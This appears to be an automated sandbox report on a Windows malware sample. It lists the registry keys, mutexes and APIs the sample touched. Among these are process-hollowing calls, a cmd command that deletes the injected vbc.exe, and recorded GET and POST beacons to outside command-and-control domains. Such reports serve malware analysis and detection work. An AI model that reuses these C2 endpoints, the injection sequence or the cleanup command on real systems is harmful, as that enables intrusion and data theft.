HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\InfoTip HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\LocalizedName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\Icon HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\Security HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\StreamResource HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\StreamResourceType HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\LocalRedirectOnly HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\Roamable HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\PreCreate HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\Stream HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\PublishExpandedPath HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\Attributes HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\FolderTypeID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\InitFolderHandler HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\TraceFlags HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\NoReflection HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AeDebug\Debugger HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\CurrentType HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\MachineID HKEY_CURRENT_USER\Control Panel\International\LocaleName HKEY_CURRENT_USER\Control Panel\International\sCountry HKEY_CURRENT_USER\Control Panel\International\sList HKEY_CURRENT_USER\Control Panel\International\sDecimal HKEY_CURRENT_USER\Control Panel\International\sThousand HKEY_CURRENT_USER\Control Panel\International\sGrouping HKEY_CURRENT_USER\Control Panel\International\sNativeDigits HKEY_CURRENT_USER\Control Panel\International\sCurrency HKEY_CURRENT_USER\Control Panel\International\sMonDecimalSep HKEY_CURRENT_USER\Control Panel\International\sMonThousandSep HKEY_CURRENT_USER\Control Panel\International\sMonGrouping HKEY_CURRENT_USER\Control Panel\International\sPositiveSign HKEY_CURRENT_USER\Control Panel\International\sNegativeSign HKEY_CURRENT_USER\Control Panel\International\sTimeFormat HKEY_CURRENT_USER\Control Panel\International\sShortTime HKEY_CURRENT_USER\Control Panel\International\s1159 HKEY_CURRENT_USER\Control Panel\International\s2359 HKEY_CURRENT_USER\Control Panel\International\sShortDate HKEY_CURRENT_USER\Control Panel\International\sYearMonth HKEY_CURRENT_USER\Control Panel\International\sLongDate HKEY_CURRENT_USER\Control Panel\International\iCountry HKEY_CURRENT_USER\Control Panel\International\iMeasure HKEY_CURRENT_USER\Control Panel\International\iPaperSize HKEY_CURRENT_USER\Control Panel\International\iDigits HKEY_CURRENT_USER\Control Panel\International\iLZero HKEY_CURRENT_USER\Control Panel\International\iNegNumber HKEY_CURRENT_USER\Control Panel\International\NumShape HKEY_CURRENT_USER\Control Panel\International\iCurrDigits HKEY_CURRENT_USER\Control Panel\International\iCurrency HKEY_CURRENT_USER\Control Panel\International\iNegCurr HKEY_CURRENT_USER\Control Panel\International\iCalendarType HKEY_CURRENT_USER\Control Panel\International\iFirstDayOfWeek HKEY_CURRENT_USER\Control Panel\International\iFirstWeekOfYear HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\Consent\NewUserDefaultConsent HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\DontSendAdditionalData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\Disabled HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\Consent\DefaultConsent HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\Consent\DefaultOverrideBehavior HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\Consent\BEX64 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\LoggingDisabled HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\DontShowUI HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\DisableArchive HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\ConfigureArchive HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\DisableQueue HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\MaxQueueCount HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\MaxArchiveCount HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\ForceQueue HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\QueuePesterInterval HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\SendEFSFiles HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\BypassDataThrottling HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\ForceUserModeCabCollection HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\DontSendAdditionalData HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\Disabled HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\Consent\DefaultConsent HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\Consent\DefaultOverrideBehavior HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\Consent\BEX64 HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\LoggingDisabled HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\DontShowUI HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\DisableArchive HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\ConfigureArchive HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\DisableQueue HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\MaxQueueCount HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\MaxArchiveCount HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\ForceQueue HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\QueuePesterInterval HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\SendEFSFiles HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\BypassDataThrottling HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\ForceUserModeCabCollection HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\CorporateWerServer HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\CorporateWerUseSSL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\CorporateWerPortNumber HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\CorporateWerUseAuthentication HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Reliability Analysis\RAC\RacWerSampleTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProductName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\EditionID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\BuildLabEx HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\CSDBuildNumber HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\BIOSVersion HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\MiniDumpAuxiliaryDlls\C:\Windows\system32\taskhost.exe HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\MiniDumpAuxiliaryDlls\C:\Windows\SYSTEM32\ntdll.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\MiniDumpAuxiliaryDlls\C:\Windows\system32\kernel32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\MiniDumpAuxiliaryDlls\C:\Windows\system32\KERNELBASE.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\MiniDumpAuxiliaryDlls\C:\Windows\system32\msvcrt.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\MiniDumpAuxiliaryDlls\C:\Windows\system32\ole32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\MiniDumpAuxiliaryDlls\C:\Windows\system32\GDI32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\MiniDumpAuxiliaryDlls\C:\Windows\system32\USER32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\MiniDumpAuxiliaryDlls\C:\Windows\system32\LPK.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\MiniDumpAuxiliaryDlls\C:\Windows\system32\USP10.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\MiniDumpAuxiliaryDlls\C:\Windows\system32\RPCRT4.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\MiniDumpAuxiliaryDlls\C:\Windows\system32\OLEAUT32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\MiniDumpAuxiliaryDlls\C:\Windows\system32\IMM32.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\MiniDumpAuxiliaryDlls\C:\Windows\system32\MSCTF.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\MiniDumpAuxiliaryDlls\C:\Windows\system32\ADVAPI32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\MiniDumpAuxiliaryDlls\C:\Windows\SYSTEM32\sechost.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\MiniDumpAuxiliaryDlls\C:\Windows\system32\api-ms-win-core-synch-l1-2-0.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\MiniDumpAuxiliaryDlls\C:\Windows\system32\SspiCli.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\MiniDumpAuxiliaryDlls\C:\Windows\system32\CRYPTBASE.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\MiniDumpAuxiliaryDlls\C:\Windows\system32\CLBCatQ.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\MiniDumpAuxiliaryDlls\C:\Windows\system32\RacEngn.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\MiniDumpAuxiliaryDlls\C:\Windows\system32\AEPIC.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\MiniDumpAuxiliaryDlls\C:\Windows\system32\VERSION.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\6FD5A890
Write Keys
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\Type HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\Consent HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\Consent\DefaultConsent
Delete Keys
Nothing to display
Mutexes
ebKgurUj Local\_!MSFTHISTORY!_ Local\c:!users!seven01!appdata!local!microsoft!windows!temporary internet files!content.ie5! Local\c:!users!seven01!appdata!roaming!microsoft!windows!cookies! Local\c:!users!seven01!appdata!local!microsoft!windows!history!history.ie5! Local\WERReportingForProcess2384 Global\\xe5\x88\x90Q
Resolved APIs
advapi32.dll.RegOpenKeyExW advapi32.dll.RegQueryInfoKeyW advapi32.dll.RegEnumKeyExW advapi32.dll.RegEnumValueW advapi32.dll.RegCloseKey advapi32.dll.RegQueryValueExW kernel32.dll.FlsAlloc kernel32.dll.FlsFree kernel32.dll.FlsGetValue kernel32.dll.FlsSetValue kernel32.dll.InitializeCriticalSectionEx kernel32.dll.CreateEventExW kernel32.dll.CreateSemaphoreExW kernel32.dll.SetThreadStackGuarantee kernel32.dll.CreateThreadpoolTimer kernel32.dll.SetThreadpoolTimer kernel32.dll.WaitForThreadpoolTimerCallbacks kernel32.dll.CloseThreadpoolTimer kernel32.dll.CreateThreadpoolWait kernel32.dll.SetThreadpoolWait kernel32.dll.CloseThreadpoolWait kernel32.dll.FlushProcessWriteBuffers kernel32.dll.FreeLibraryWhenCallbackReturns kernel32.dll.GetCurrentProcessorNumber kernel32.dll.GetLogicalProcessorInformation kernel32.dll.CreateSymbolicLinkW kernel32.dll.EnumSystemLocalesEx kernel32.dll.CompareStringEx kernel32.dll.GetDateFormatEx kernel32.dll.GetLocaleInfoEx kernel32.dll.GetTimeFormatEx kernel32.dll.GetUserDefaultLocaleName kernel32.dll.IsValidLocaleName kernel32.dll.LCMapStringEx kernel32.dll.GetTickCount64 advapi32.dll.EventRegister mscoree.dll.#142 mscoreei.dll.RegisterShimImplCallback mscoreei.dll.OnShimDllMainCalled mscoreei.dll._CorExeMain shlwapi.dll.UrlIsW version.dll.GetFileVersionInfoSizeW version.dll.GetFileVersionInfoW version.dll.VerQueryValueW clr.dll.SetRuntimeInfo clr.dll._CorExeMain mscoree.dll.CreateConfigStream mscoreei.dll.CreateConfigStream kernel32.dll.GetNumaHighestNodeNumber kernel32.dll.GetSystemWindowsDirectoryW advapi32.dll.AllocateAndInitializeSid advapi32.dll.OpenProcessToken advapi32.dll.GetTokenInformation advapi32.dll.InitializeAcl advapi32.dll.AddAccessAllowedAce advapi32.dll.FreeSid kernel32.dll.AddSIDToBoundaryDescriptor kernel32.dll.CreateBoundaryDescriptorW kernel32.dll.CreatePrivateNamespaceW kernel32.dll.OpenPrivateNamespaceW kernel32.dll.DeleteBoundaryDescriptor kernel32.dll.WerRegisterRuntimeExceptionModule kernel32.dll.RaiseException mscoree.dll.#24 mscoreei.dll.#24 ntdll.dll.NtSetSystemInformation kernel32.dll.SortGetHandle kernel32.dll.SortCloseHandle kernel32.dll.GetNativeSystemInfo ole32.dll.CoInitializeEx cryptbase.dll.SystemFunction036 clrjit.dll.sxsJitStartup clrjit.dll.getJit kernel32.dll.ReleaseMutex kernel32.dll.CreateMutexW kernel32.dll.CloseHandle kernel32.dll.LocaleNameToLCID kernel32.dll.LCIDToLocaleName kernel32.dll.GetUserPreferredUILanguages shell32.dll.SHGetFolderPathW ole32.dll.CoTaskMemAlloc ole32.dll.CoTaskMemFree kernel32.dll.GetFullPathNameW mscoree.dll.GetProcessExecutableHeap mscoreei.dll.GetProcessExecutableHeap kernel32.dll.SetThreadErrorMode kernel32.dll.GetFileAttributesExW kernel32.dll.CompareStringOrdinal clr.dll.CreateAssemblyNameObject ole32.dll.CoGetContextToken ole32.dll.CoGetObjectContext sechost.dll.LookupAccountNameLocalW advapi32.dll.LookupAccountSidW sechost.dll.LookupAccountSidLocalW cryptsp.dll.CryptAcquireContextW cryptsp.dll.CryptGenRandom ole32.dll.NdrOleInitializeExtension ole32.dll.CoGetClassObject ole32.dll.CoGetMarshalSizeMax ole32.dll.CoMarshalInterface ole32.dll.CoUnmarshalInterface ole32.dll.StringFromIID ole32.dll.CoGetPSClsid ole32.dll.CoCreateInstance ole32.dll.CoReleaseMarshalData ole32.dll.DcomChannelSetHResult rpcrtremote.dll.I_RpcExtInitializeExtensionPoint clr.dll.CreateAssemblyEnum kernel32.dll.ResolveLocaleName kernel32.dll.LoadLibraryA kernel32.dll.WideCharToMultiByte kernel32.dll.GetProcAddress kernel32.dll.GetModuleHandleA advapi32.dll.LookupPrivilegeValueW kernel32.dll.GetCurrentProcess advapi32.dll.AdjustTokenPrivileges ntdll.dll.NtQuerySystemInformation kernel32.dll.CreateProcessA kernel32.dll.GetThreadContext kernel32.dll.Wow64GetThreadContext kernel32.dll.SetThreadContext kernel32.dll.Wow64SetThreadContext kernel32.dll.ReadProcessMemory kernel32.dll.WriteProcessMemory ntdll.dll.NtUnmapViewOfSection kernel32.dll.VirtualAllocEx kernel32.dll.ResumeThread advapi32.dll.EventUnregister ole32.dll.CoUninitialize oleaut32.dll.#500 kernel32.dll.CreateActCtxW kernel32.dll.AddRefActCtx kernel32.dll.ReleaseActCtx kernel32.dll.ActivateActCtx kernel32.dll.DeactivateActCtx kernel32.dll.GetCurrentActCtx kernel32.dll.QueryActCtxW cryptsp.dll.CryptReleaseContext uxtheme.dll.ThemeInitApiHook user32.dll.IsProcessDPIAware mlang.dll.#112 wininet.dll.FindFirstUrlCacheEntryA kernel32.dll.SetFileInformationByHandle urlmon.dll.CreateUri kernel32.dll.InitializeSRWLock kernel32.dll.AcquireSRWLockExclusive kernel32.dll.AcquireSRWLockShared kernel32.dll.ReleaseSRWLockExclusive kernel32.dll.ReleaseSRWLockShared wininet.dll.FindNextUrlCacheEntryA wininet.dll.FindCloseUrlCache kernel32.dll.IsProcessorFeaturePresent user32.dll.GetWindowInfo user32.dll.GetAncestor user32.dll.GetMonitorInfoA user32.dll.EnumDisplayMonitors user32.dll.EnumDisplayDevicesA gdi32.dll.ExtTextOutW gdi32.dll.GdiIsMetaPrintDC windowscodecs.dll.DllGetClassObject kernel32.dll.WerRegisterMemoryBlock oleaut32.dll.#8 oleaut32.dll.#9 oleaut32.dll.#10 kernel32.dll.SetThreadUILanguage kernel32.dll.CopyFileExW kernel32.dll.IsDebuggerPresent kernel32.dll.SetConsoleInputExeNameW dwmapi.dll.DwmIsCompositionEnabled rpcrt4.dll.UuidFromStringW radarrs.dll.WdiDiagnosticModuleMain radarrs.dll.WdiHandleInstance radarrs.dll.WdiGetDiagnosticModuleInterfaceVersion wersvc.dll.ServiceMain wersvc.dll.SvchostPushServiceGlobals advapi32.dll.RegGetValueW sechost.dll.ConvertStringSecurityDescriptorToSecurityDescriptorW faultrep.dll.WerpInitiateCrashReporting wer.dll.WerpCreateMachineStore shell32.dll.SHGetFolderPathEx ole32.dll.StringFromGUID2 profapi.dll.#104 userenv.dll.CreateEnvironmentBlock sechost.dll.ConvertSidToStringSidW sspicli.dll.GetUserNameExW userenv.dll.DestroyEnvironmentBlock wer.dll.WerpSvcReportFromMachineQueue advapi32.dll.DuplicateToken advapi32.dll.CheckTokenMembership wtsapi32.dll.WTSQueryUserToken winsta.dll.WinStationQueryInformationW advapi32.dll.CreateWellKnownSid rpcrt4.dll.RpcStringBindingComposeW rpcrt4.dll.RpcBindingFromStringBindingW rpcrt4.dll.RpcStringFreeW rpcrt4.dll.RpcBindingSetAuthInfoExW rpcrt4.dll.NdrClientCall3 rpcrt4.dll.RpcBindingFree advapi32.dll.ImpersonateLoggedOnUser advapi32.dll.CreateProcessAsUserW imm32.dll.ImmDisableIME psapi.dll.GetModuleFileNameExW wer.dll.WerpCreateIntegratorReportId wer.dll.WerReportCreate wer.dll.WerpSetIntegratorReportId wer.dll.WerReportSetParameter dbgeng.dll.DebugCreate ntdll.dll.CsrGetProcessId ntdll.dll.DbgBreakPoint ntdll.dll.DbgPrint ntdll.dll.DbgPrompt ntdll.dll.DbgUiConvertStateChangeStructure ntdll.dll.DbgUiGetThreadDebugObject ntdll.dll.DbgUiIssueRemoteBreakin ntdll.dll.DbgUiSetThreadDebugObject ntdll.dll.NtAllocateVirtualMemory ntdll.dll.NtClose ntdll.dll.NtCreateDebugObject ntdll.dll.NtCreateFile ntdll.dll.NtDebugActiveProcess ntdll.dll.NtDebugContinue ntdll.dll.NtFreeVirtualMemory ntdll.dll.NtOpenProcess ntdll.dll.NtOpenThread ntdll.dll.NtQueryInformationProcess ntdll.dll.NtQueryInformationThread ntdll.dll.NtQueryMutant ntdll.dll.NtQueryObject ntdll.dll.NtRemoveProcessDebug ntdll.dll.NtResumeThread ntdll.dll.NtSetInformationDebugObject ntdll.dll.NtSetInformationProcess ntdll.dll.NtSystemDebugControl ntdll.dll.NtWaitForDebugEvent ntdll.dll.RtlAnsiStringToUnicodeString ntdll.dll.RtlCreateProcessParameters ntdll.dll.RtlCreateUserProcess ntdll.dll.RtlDestroyProcessParameters ntdll.dll.RtlDosPathNameToNtPathName_U ntdll.dll.RtlFindMessage ntdll.dll.RtlFreeHeap ntdll.dll.RtlFreeUnicodeString ntdll.dll.RtlGetFunctionTableListHead ntdll.dll.RtlGetUnloadEventTrace ntdll.dll.RtlGetUnloadEventTraceEx ntdll.dll.RtlInitAnsiString ntdll.dll.RtlInitUnicodeString ntdll.dll.RtlTryEnterCriticalSection ntdll.dll.RtlUnicodeStringToAnsiString ntdll.dll.NtOpenProcessToken ntdll.dll.NtOpenThreadToken ntdll.dll.NtQueryInformationToken kernel32.dll.CloseProfileUserMapping kernel32.dll.CreateToolhelp32Snapshot kernel32.dll.DebugActiveProcessStop kernel32.dll.DebugBreak kernel32.dll.DebugBreakProcess kernel32.dll.DebugSetProcessKillOnExit kernel32.dll.Module32First kernel32.dll.Module32FirstW kernel32.dll.Module32Next kernel32.dll.Module32NextW kernel32.dll.OpenThread kernel32.dll.Process32First kernel32.dll.Process32FirstW kernel32.dll.Process32Next kernel32.dll.Process32NextW kernel32.dll.ProcessIdToSessionId kernel32.dll.SetProcessShutdownParameters kernel32.dll.Thread32First kernel32.dll.Thread32Next kernel32.dll.GetTimeZoneInformation kernel32.dll.DuplicateHandle kernel32.dll.Wow64GetThreadSelectorEntry advapi32.dll.CloseServiceHandle advapi32.dll.ControlService advapi32.dll.CreateServiceA advapi32.dll.CreateServiceW advapi32.dll.DeleteService advapi32.dll.EnumServicesStatusExA advapi32.dll.EnumServicesStatusExW advapi32.dll.GetEventLogInformation advapi32.dll.OpenSCManagerA advapi32.dll.OpenSCManagerW advapi32.dll.OpenServiceA advapi32.dll.OpenServiceW advapi32.dll.StartServiceA advapi32.dll.StartServiceW advapi32.dll.GetSidSubAuthority advapi32.dll.GetSidSubAuthorityCount version.dll.GetFileVersionInfoSizeExW version.dll.GetFileVersionInfoExW dbghelp.dll.WinDbgExtensionDllInit dbghelp.dll.ExtensionApiVersion wer.dll.WerpSetDynamicParameter wer.dll.WerReportAddDump wer.dll.WerpSetCallBack wer.dll.WerReportSetUIOption wer.dll.WerpAddRegisteredDataToReport wer.dll.WerReportSubmit user32.dll.LoadStringW advapi32.dll.RegCreateKeyExW advapi32.dll.RegSetValueExW sensapi.dll.IsNetworkAlive user32.dll.CharUpperW wer.dll.WerpAddAppCompatData apphelp.dll.SdbGetFileAttributes apphelp.dll.SdbFormatAttribute apphelp.dll.SdbFreeFileAttributes cryptsp.dll.CryptCreateHash cryptsp.dll.CryptHashData cryptsp.dll.CryptGetHashParam cryptsp.dll.CryptDestroyHash dbghelp.dll.MiniDumpWriteDump kernel32.dll.GetLongPathNameA kernel32.dll.GetLongPathNameW kernel32.dll.GetProcessTimes advapi32.dll.RegOpenKeyExA advapi32.dll.RegQueryValueExA powrprof.dll.CallNtPowerInformation psapi.dll.EnumProcessModules version.dll.GetFileVersionInfoSizeA version.dll.GetFileVersionInfoA version.dll.VerQueryValueA verifier.dll.VerifierEnumerateResource ntdll.dll.NtSuspendProcess ntdll.dll.NtResumeProcess advapi32.dll.QueryTraceW advapi32.dll.IsValidSid advapi32.dll.GetLengthSid advapi32.dll.CopySid advapi32.dll.AddAccessAllowedAceEx advapi32.dll.InitializeSecurityDescriptor advapi32.dll.SetSecurityDescriptorDacl advapi32.dll.RegisterEventSourceW advapi32.dll.ReportEventW advapi32.dll.DeregisterEventSource wer.dll.WerpGetStoreLocation wer.dll.WerpGetStoreType
Execute Commands
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" C:\Windows\system32\lsass.exe taskhost.exe $(Arg0) C:\Windows\System32\svchost.exe -k WerSvcGroup C:\Windows\system32\WerFault.exe -u -p 2384 -s 292
Started Services
VaultSvc WerSvc
Created Services
Nothing to display
Behavior analysis details | |||||
---|---|---|---|---|---|
Machine name | Machine label | Machine manager | Started | Ended | Duration |
Seven01b_64 | Seven01b_64 | VirtualBox | 2018-11-08 12:07:09 | 2018-11-08 12:10:33 | 204 |
13 HTTP Request(s) detected
http://www.glowsole.com/ca/?8pgTVpAp=kA6gmZ5EWLoc3k3LepBIjgUX/v60aq6scZPph6z89XUxJ6XCAsys1W5b+p4aSJBn2pC8+Pgm&Bj=lHU80vox_T4h
- Hostname: www.glowsole.com
- IP Address:
- Port: 80
- Count: 1
GET /ca/?8pgTVpAp=kA6gmZ5EWLoc3k3LepBIjgUX/v60aq6scZPph6z89XUxJ6XCAsys1W5b+p4aSJBn2pC8+Pgm&Bj=lHU80vox_T4h HTTP/1.1 Host: www.glowsole.com Connection: close \x00\x00\x00\x00\x00\x00\x00
http://www.classicrockandgems.com/ca/?8pgTVpAp=mCOHzPdu+fAGyzf1IeqFEZ+iBma2k3gF8M3pIM6w8KkZAJQpYbIqp1d8U9j4Hw7I07TASQAS&Bj=lHU80vox_T4h
- Hostname: www.classicrockandgems.com
- IP Address:
- Port: 80
- Count: 1
GET /ca/?8pgTVpAp=mCOHzPdu+fAGyzf1IeqFEZ+iBma2k3gF8M3pIM6w8KkZAJQpYbIqp1d8U9j4Hw7I07TASQAS&Bj=lHU80vox_T4h HTTP/1.1 Host: www.classicrockandgems.com Connection: close \x00\x00\x00\x00\x00\x00\x00
http://www.classicrockandgems.com/ca/
- Hostname: www.classicrockandgems.com
- IP Address:
- Port: 80
- Count: 1
POST /ca/ HTTP/1.1 Host: www.classicrockandgems.com Connection: close Content-Length: 2202 Cache-Control: no-cache Origin: http://www.classicrockandgems.com User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.classicrockandgems.com/ca/ Accept-Language: en-US Accept-Encoding: gzip, deflate 